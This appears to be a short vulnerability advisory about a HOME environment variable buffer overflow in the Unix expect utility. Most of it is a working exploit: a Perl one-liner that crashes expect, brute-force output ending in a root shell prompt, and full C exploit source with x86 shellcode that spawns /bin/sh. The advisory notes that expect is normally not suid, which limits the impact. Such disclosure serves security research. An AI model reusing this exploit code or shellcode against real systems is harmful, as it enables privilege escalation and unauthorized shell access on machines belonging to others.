|
Vulnerability expect Affected various Description Kevin Finisterre posted following. He found an overflow in and coded the exploit code for several versions of /usr/bin/expect... on SCO, linux, and BSD variants. We are unable to think of a situation where this would be useful due to the fact that expect is not suid... except on Cray. [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'` [root@linux elguapo]# expect Segmentation fault (core dumped) //krfinisterre@checkfree.com or dotslash@snosoft.com //this is output from my brute script... //722 //Stack pointer: 0xbffffa18 // Offset: 0x2d3 // Return addr: 0xbffff745 //stack/brute.sh: line 11: 2190 Illegal instruction (core dumped) $3 $L //723 //Stack pointer: 0xbffffa18 // Offset: 0x2d4 // Return addr: 0xbffff744 //sh-2.04# //note that I was root when I ran this ... expect is not suid #define BUFFERSIZE 533 unsigned long sp(void) { __asm__("movl %esp, %eax"); } int main(int argc,char **argv) { char hell[] = "\x29\xc0" "\x29\xc0" "\xb0\x47" "\x29\xdb" "\xb3\x0c" "\x89\xd9" "\xcd\x80" "\x5e" "\x29\xc0" "\x88\x46\x07" "\x89\x46\x0c" "\x89\x76\x08" "\xb0\x0b" "\x87\xf3" "\x8d\x4b\x08" "\x8d\x53\x0c" "\xcd\x80" "\xe8\xe3\xff\xff\xff" "\x2f\x62\x69\x6e\x2f\x73\x68"; int i; int offset; long esp; long ret; long *addr_ptr; char *buffer, *ptr; offset = atoi(argv[1]); esp = sp(); ret = esp-offset; if(!(buffer = malloc(BUFFERSIZE))) { printf("oops\n"); exit(-1); } ptr = buffer; addr_ptr = (long *)ptr; for (i=0; i<BUFFERSIZE; i+=4) *(addr_ptr++) = ret; for (i=0; i<BUFFERSIZE/2; i++) buffer[i] = '\xeb02'; ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2)); for(i=0; i<strlen(hell); i++) *(ptr++) = hell[i]; buffer[BUFFERSIZE-1] = 0; setenv("HOME", buffer, 1); execlp("/usr/bin/expect", 0); } Solution Nothing... Just keep Your expect non suid.